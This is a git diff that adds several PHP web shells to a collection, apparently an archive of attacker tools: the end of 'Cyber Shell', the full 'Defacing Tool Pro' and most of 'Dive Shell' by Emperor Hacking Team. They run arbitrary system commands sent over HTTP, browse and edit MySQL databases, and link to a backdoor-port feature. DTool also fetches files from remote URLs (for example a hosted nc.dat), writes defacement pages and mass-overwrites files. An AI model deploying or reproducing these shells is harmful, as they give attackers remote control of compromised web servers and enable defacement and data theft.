+
+echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&var=$var&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$valtext</a></td>";
+}}
+
+echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass&del>Óäàëèòü</a></td></tr>";
+$pixidname='';
+$pixid='';
+}
+
+echo "<form  action=\"$PHP_SELF\" method=\"POST\">";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
+}}
+echo "<td></td></tr>";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#FFFFFF' bordercolor='#FFFFFF'><center><input type='text' name='newpole$var' value='$var' size='5'></center></td>";
+}}
+echo "</tr>";
+echo "</table>";
+echo "<input type=\"submit\"  value=\"Äîáàâèòü íîâóş çàïèñü\" >";
+echo "
+<input type=\"hidden\" name=\"dbname\" value=\"$dbname\">
+<input type=\"hidden\" name=\"table\" value=\"$table\">
+<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
+<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
+<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
+";
+echo "</form>";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($pixidname)) and (isset($pixid)) and (isset($del))){
+echo "hello";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+mysql_query("delete from $mtable where $pixidname='$pixid'");
+echo "<head><meta http-equiv=\"refresh\" content=\"0;URL=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass\"></head>";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid)) and (isset($textofmysql))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+mysql_query("update $mtable set $var='$textofmysql' where $pixidname=$pixid");
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+$re=mysql_query("select $var from $mtable where $pixidname='$pixid'");
+$res=mysql_fetch_array($re);
+$text=untag($res[$var]);
+
+echo "
+<form  action=\"$PHP_SELF\" method=\"POST\">
+<textarea name=\"textofmysql\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$text</textarea>
+<input type=\"hidden\" name=\"dbname\" value=\"$dbname\" >
+<input type=\"hidden\" name=\"mtable\" value=\"$mtable\" >
+<input type=\"hidden\" name=\"var\" value=\"$var\" >
+<input type=\"hidden\" name=\"pixidname\" value=\"$pixidname\" >
+<input type=\"hidden\" name=\"pixid\" value=\"$pixid\" >
+<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
+<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
+<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
+<br><input type=\"submit\"  value=\"            Èçìåíèòü            \" >
+</form>
+<a href=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Âåğíóòüñÿ ê ñïèñêó</a>
+";
+}
+
+if (isset($showdb) && empty($showtables)){
+$re=mysql_query("show databases");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>Ñïèñîê äîñòóïíûõ ÁÄ:</span></div></center></td></tr>";
+while($res=mysql_fetch_array($re)){
+echo "<tr><td><center><a href=$PHP_SELF?showtables=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></center></td></tr>";
+}
+echo "</table>";
+}
+if (isset($showtables) and !empty($showtables)){
+
+if (isset($xlimit)){
+$_SESSION[limit]=$xlimit;
+if (isset($xlenth))
+$_SESSION[lenth]=$xlenth;
+else $_SESSION[lenth]="";
+}
+
+echo "<a href=$PHP_SELF?showdb&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Íàçàä ê ñïèñêó ÁÄ</a>";
+$re=mysql_query("SHOW TABLES FROM $showtables");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>$showtables - Ñïèñîê òàáëèö: </span></div></center></td></tr>";
+while($res=mysql_fetch_array($re)){
+echo "<tr><td><center><a href=$PHP_SELF?dbname=$showtables&table=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></td></tr>";
+}
+echo "</table>";
+
+if (($_SESSION[lenth]) == "on")
+$ch="checked";
+else
+$ch="";
+
+echo <<< EOF
+<form  action="$PHP_SELF" method="get">
+<input type="hidden" name="showtables" value="$showtables" >
+<input type="hidden" name="db_server" value="$db_server" >
+<input type="hidden" name="db_user" value="$db_user" >
+<input type="hidden" name="db_pass" value="$db_pass" >
+îãğàíè÷åíèå íà êîëè÷åñòâî âûâîäèìûõ ïîëåé:<br>
+<select name="xlimit">
+  <option value="0">&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1074;&#1089;&#1105;</option>
+  <option value="10">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 10</option>
+  <option value="20">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 20</option>
+  <option value="30">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 30</option>
+  <option value="50">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 50</option>
+  <option value="100">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 100</option>
+  <option value="200">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 200</option>
+  <option value="500">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 500</option>
+  <option value="1000">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 1000</option>
+  <option value="5000">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 5000</option>
+</select>
+<br>Âêëş÷èòü îãğàíè÷åíèå íà äëèíó âûâîäèìûõ ïîëåé <input name="xlenth" type="checkbox" value="on" $ch><br>
+<input type="submit"  value="Ïğèìåíèòü" >
+EOF;
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+echo "<br>Òåêóùåå îãğàíè÷åíèå: $_SESSION[limit]";
+}
+
+if (isset($tools) or isset($tmysql))
+echo "
+<center>
+<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCCC'>
+<tr height='10'>
+<td align='center' bordercolor='#ECE9D8' bgcolor='#FFF8FF'>
+.: MySQL :.
+</td>
+</tr height='10'>
+<tr>
+<td align='center' bordercolor='#ECE9D8' bgcolor='#FFFFFF'>
+<form name='zapros' method='get' action=''>
+<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
+<tr align='center' >
+<td>
+Host
+</td>
+<td>
+<input name='db_server' type='text' value='localhost'>
+</td>
+</tr>
+<tr align='center' >
+<td>
+Login MySQL
+</td> 
+<td>
+<input type='text' name='db_user' value=''> 
+</tr>
+<tr align='center' >
+<td>
+Password MySQL
+</td> 
+<td>
+<input type='text' name='db_pass' value=''>
+<input type='hidden' name='showdb'>
+</td> 
+</tr>
+<tr align='center' >
+<td>
+Èìÿ ÁÄ (íå îáÿçàòåëüíî)
+</td> 
+<td>
+<input type='text' name='showtables' value=''>
+</td> 
+</tr>
+<tr align='center' >
+<td>
+<input type='submit'>
+</td>
+<td>
+<input type='reset'>
+</td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+</center>
+";
+}
+echo <<< EOF
+<center>.:Cyber Shell (v 1.0):.<br>Copyright © <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</a>, 2002-2006</center>
+</td>
+</tr>
+</table>
+EOF;
+
+$d=tourl($d);
+echo "
+<center>
+<span class='style1'>
+<a href=$PHP_SELF?d=$d&diz&tmkdir>.: Ñîçäàòü ïàïêó :.</a>
+<a href=$PHP_SELF?d=$d&diz&tmkfile>.: Ñîçäàòü ôàéë :.</a>
+<a href=$PHP_SELF?d=$d&diz&tbackdoor>.: Îòêğûòü ïîğò äëÿ ïîäêëş÷åíèÿ :.</a><br>
+<a href=$PHP_SELF?d=$d&diz&tbash>.: Bash :.</a>
+<a href=$PHP_SELF?d=$d&diz&tupload>.: Çàêà÷àòü ôàéë :.</a>
+</span>
+</center>
+";
+}
+die;
+?>
diff --git a/138shell/D/DTool Pro.txt b/138shell/D/DTool Pro.txt
new file mode 100644
index 0000000..0799e5e
--- /dev/null
+++ b/138shell/D/DTool Pro.txt	
@@ -0,0 +1,198 @@
+<?php
+
+if(empty($chdir)) $chdir = @$_GET['chdir'];
+if(empty($cmd)) $cmd = @$_GET['cmd'];
+if(empty($fu)) $fu = @$_GET['fu'];
+if(empty($list)) $list = @$_GET['list'];
+
+if(empty($chdir) or $chdir=='') $chdir=getcwd();
+$cmd = stripslashes(trim($cmd));
+
+
+//CHDIR tool
+if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
+	$boom = explode(" ",$cmd,2);
+	$boom2 = explode(";",$boom['1'], 2);
+	$toDir = $boom2['0'];
+
+	if($boom['1']=="/")$chdir="";
+	else if(strpos($cmd, 'chdir ..')!==false){
+		$cadaDir = array_reverse(explode("/",$chdir));
+
+		if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
+		else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
+		$toDir = str_replace($lastDir,"",$chdir);
+		if($toDir=="/")$chdir="";
+	}
+	else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
+	else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();
+
+	if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
+	if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
+	else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
+	else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
+	if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
+	if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
+}
+if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
+$cmdShow = $cmd;
+
+//To keep the changes in the url, when using the 'GET' way to send php variables
+if(empty($post)){
+	if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
+	if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
+	if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
+}
+
+//INFO table (pro and normal)
+if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
+if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
+if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
+if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
+if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
+if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
+$safe = @ini_get($safemode);
+if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
+$pro8 = "<i>PHP </i>".phpversion();
+$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
+$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
+$ip=@gethostbyname($_SERVER['HTTP_HOST']);
+
+//Turns the 'ls' command more usefull, showing it as it looks in the shell
+if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
+else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
+else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
+else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
+else if($cmd=='ls') $cmd = "ls -F";
+
+//If there are some '//' in the cmd, its now removed
+if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
+?>
+<body onload="focar();">
+<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
+.infop{font-family: verdana; font-size: 10px; color:#000000;}
+.infod{font-family: verdana; font-size: 10px; color:#414978;}
+.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
+.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
+<script>
+function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
+function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
+function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
+function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
+function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
+function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
+function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
+function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
+function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
+function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
+</script>
+<table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
+<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
+<font size=3>by r3v3ng4ns - revengans@gmail.com </font>
+</b></div></td></tr>
+<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
+<?php
+ $uname = @posix_uname();
+ while (list($info, $value) = each ($uname)) { ?>
+<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
+<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
+<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
+<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
+<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
+<? if($chdir!=getcwd()){?>
+<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
+<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
+</DIV></TD></TR></TABLE></td></tr>
+<tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
+<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
+<td width="75"><DIV class="algod">command</DIV></td>
+<td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
+<script>
+function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
+</script>
+</td></tr></table><table><tr><td>
+<?php
+ob_start();
+if(isset($chdir)) @chdir($chdir);
+function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
+function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
+function shell($what){echo(shell_exec($what));}
+function popenn($what){
+	$handle=popen("$what", "r");
+	$out=@fread($handle, 2096);
+	echo $out;
+	@pclose($handle);
+}
+function execc($what){
+	exec("$what",$array_out);
+	$out=implode("\n",$array_out);
+	echo $out;
+}
+function procc($what){
+	//na sequencia: stdin, stdout, sterr
+	if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
+	$process = @proc_open("$what",$descpec,$pipes);
+	if (is_resource($process)) {
+		fwrite($pipes[0], "");
+		fclose($pipes[0]);
+
+		while(!feof($pipes[2])) {
+			$erro_retorno = fgets($pipes[2], 4096);
+			if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
+		}
+    		fclose($pipes[2]);
+
+		while(!feof($pipes[1])) {
+			echo fgets($pipes[1], 4096);
+		}
+		fclose($pipes[1]);
+
+		$ok_p_fecha = @proc_close($process);
+	}else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
+}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
+}
+
+$funE="function_exists";
+if($safe){$fe="safemode";$feshow=$fe;}
+elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
+elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
+elseif($funE('system')){$fe="system";$feshow=$fe;}
+elseif($funE('exec')){$fe="execc";$feshow="exec";}
+elseif($funE('popen')){$fe="popenn";$feshow="popen";}
+elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
+else {$fe="nofunction";$feshow=$fe;}
+if($fu!="0" or !empty($fu)){
+  if($fu==1){$fe="passthru";$feshow=$fe;}
+  if($fu==2){$fe="system";$feshow=$fe;}
+  if($fu==3){$fe="execc";$feshow="exec";}
+  if($fu==4){$fe="popenn";$feshow="popen";}
+  if($fu==5){$fe="shell";$feshow="shell_exec";}
+  if($fu==6){$fe="procc";$feshow="proc_open";}
+}
+$fe("$cmd 2>&1");
+$output=ob_get_contents();ob_end_clean();
+?>
+<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
+<option><?="using $feshow()";?>
+<option value="1">use passthru()
+<option value="2">use system()
+<option value="3">use exec()
+<option value="4">use popen()
+<option value="5">use shell_exec()
+<option value="6">use proc_open()*new
+<option value="0">auto detect (default)
+</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
+<? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
+</tr></table></td></tr></table></form></td></tr>
+<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
+<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
+<?php
+echo $ch_msg;
+if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
+if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
+?></TEXTAREA><BR></td></tr>
+<?php
+if($list=="1") @include($remote_addr."flist".$format_addr);
+?>
+</table>
+
diff --git a/138shell/D/Dive Shell 1.0 - Emperor Hacking Team.txt b/138shell/D/Dive Shell 1.0 - Emperor Hacking Team.txt
new file mode 100644
index 0000000..9c6d47e
--- /dev/null
+++ b/138shell/D/Dive Shell 1.0 - Emperor Hacking Team.txt	
@@ -0,0 +1,187 @@
+<?php
+
+/*Emperor Hacking TEAM */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>Dive Shell - Emperor Hacking Team</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #FFFFFF">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
+</font></p>
+
+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
+<div style="width: 989; height: 456">
+  <p align="center"><b>
+  <font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
+  <input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
+  </font>
+  &nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea> </p>
+<p class="prompt" align="center">
